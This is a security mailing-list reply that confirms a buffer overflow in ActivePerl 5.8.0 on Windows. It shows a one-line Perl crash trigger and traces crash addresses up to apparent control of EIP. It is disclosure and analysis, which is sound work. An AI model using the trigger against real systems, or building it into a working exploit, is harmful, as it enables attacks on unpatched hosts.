Re: Buffer Overflow in ActivePerl ?
"Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx> wrote:
> i played around with ActiveState's ActivePerl for Win32, and crashed
> Perl.exe with the following command:
>
> perl -e "$a="A" x 256; system($a)"
Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
all but last week's security patch:
perl -e "$a="A" x 256; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x00657865. The memory could not be "written".
Also, it is likely exploitable -- push up the number of A's a bit:
C:\>perl -e "$a="A" x 259; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x65004141. The memory could not be "written".
and we seem to get control of EIP. Coincidence? Try yet two more:
C:\>perl -e "$a="A" x 261; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x41414141. The memory could not be "written".
Looks like full control of EIP...
However, there is not likely to be a privilege escalation here unless
perhaps a script processor on a web server can be cajoled into doing
something with this?? (Not at all familiar with the innards of Windows
web servers and their relationship to their CGI, etc processors...)
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854